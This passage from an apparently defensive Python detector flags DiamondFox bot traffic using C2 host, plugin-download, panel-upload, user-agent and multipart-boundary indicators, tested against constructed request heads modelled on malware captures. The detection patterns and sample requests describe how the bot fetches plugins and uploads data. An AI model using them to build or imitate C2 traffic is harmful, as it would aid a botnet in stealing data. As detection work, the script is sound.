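NON_BROWSER_UAS = ("vb wininet", "mozilla/4.0 (compatible; win32; winhttp.winhttprequest.5)")
PANEL_BOUNDARY = "boundary=Xu02=$"                      # identical in every captured POST
HIT_THRESHOLD = 2                                       # assumed: two independent indicators


def parse_request(raw: str):
    """Split an HTTP/1.1 request head into (method, target, headers); header names lower-cased."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers


def diamondfox_indicators(raw: str) -> list:
    """Return the names of every indicator the request matches, in a fixed order."""
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)   # keep "pl=" even though it is empty
    hits = []
    if headers.get("host", "").lower() in KNOWN_C2_HOSTS:
        hits.append("known C2 host")
    if method == "GET" and PLUGIN_PATH.match(url.path):
        hits.append("plugin download /plugins/*.p")
    if method == "POST" and url.path.endswith("/post.php") and "pl" in query and "slots" in query:
        hits.append("panel upload pl=&slots=")
    if headers.get("user-agent", "").lower().startswith(NON_BROWSER_UAS):
        hits.append("non-browser user agent")
    if PANEL_BOUNDARY in headers.get("content-type", ""):
        hits.append("fixed multipart boundary")
    return hits


def is_diamondfox(raw: str) -> bool:
    """Alert when at least HIT_THRESHOLD independent indicators are present."""
    return len(diamondfox_indicators(raw)) >= HIT_THRESHOLD


# Constructed request heads modelled on the report's captures.
REQ_UPLOAD = (
    "POST /post.php?pl=&slots=1 HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: multipart/form-data; boundary=Xu02=$\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Content-Length: 121\r\n"
    "Host: locahost.com\r\n"
)
REQ_PLUGIN = "GET /plugins/ftp.p HTTP/1.1\r\nUser-Agent: vb wininet\r\nHost: locahost.com\r\n"
REQ_BENIGN = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n"

if __name__ == "__main__":
    for label, raw in (("upload", REQ_UPLOAD), ("plugin", REQ_PLUGIN), ("benign", REQ_BENIGN)):
        print(label, is_diamondfox(raw), diamondfox_indicators(raw))
```

The host check is the weakest of the five once the operator moves the panel; the plugin path, the empty pl= parameter and the constant boundary string are tied to the bot's code and survive a change of domain.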
Author: Vitali Kremez